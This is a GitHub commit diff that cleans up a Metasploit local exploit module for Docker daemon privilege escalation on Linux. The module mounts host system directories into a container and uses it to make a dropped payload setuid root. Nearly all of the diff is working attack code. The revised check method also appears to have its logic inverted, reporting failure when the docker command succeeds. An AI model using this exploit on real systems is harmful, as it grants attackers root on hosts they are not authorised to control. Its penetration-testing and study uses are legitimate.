Skip to content

Commit c6214d9

Browse files
wvuwvu
committed
Fix and clean module
1 parent 6f35a04 commit c6214d9

File tree

1 file changed

+7
-15
lines changed

1 file changed

+7
-15
lines changed

modules/exploits/linux/local/docker_daemon_privilege_escalation.rb

Lines changed: 7 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -3,14 +3,12 @@
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
55

6-
require 'msf/core'
7-
require 'rex'
8-
require 'msf/core/exploit/exe'
9-
106
class MetasploitModule < Msf::Exploit::Local
7+
118
Rank = ExcellentRanking
12-
include Msf::Exploit::EXE
9+
1310
include Msf::Post::File
11+
include Msf::Exploit::EXE
1412
include Msf::Exploit::FileDropper
1513

1614
def initialize(info={})
@@ -26,18 +24,17 @@ def initialize(info={})
2624
'Platform' => 'linux',
2725
'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
2826
'Targets' => [ ['Automatic', {}] ],
29-
'DefaultOptions' => { 'PrependFork' => true },
27+
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
3028
'SessionTypes' => ['shell', 'meterpreter']
3129
}
3230
))
3331
register_advanced_options([
34-
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
3532
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
3633
], self.class)
3734
end
3835

3936
def check
40-
if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
37+
if cmd_exec('docker ps && echo true') == 'true'
4138
print_error("Failed to access Docker daemon.")
4239
Exploit::CheckCode::Safe
4340
else
@@ -58,19 +55,15 @@ def exploit
5855
vprint_status shell_script(exe_path)
5956
vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
6057

61-
stime = Time.now.to_f
62-
print_status "Waiting for payload"
63-
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
64-
Rex.sleep(1)
65-
end
58+
print_status "Waiting #{datastore['WfsDelay']}s for payload"
6659
end
6760

6861
def shell_script(exploit_path)
6962
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
7063
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
7164

7265
%Q{
73-
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | cut -d ":" -f2`
66+
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
7467
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
7568
docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
7669
docker rmi -f $IMG
@@ -79,4 +72,3 @@ def shell_script(exploit_path)
7972
end
8073

8174
end
82-

0 commit comments

Comments
 (0)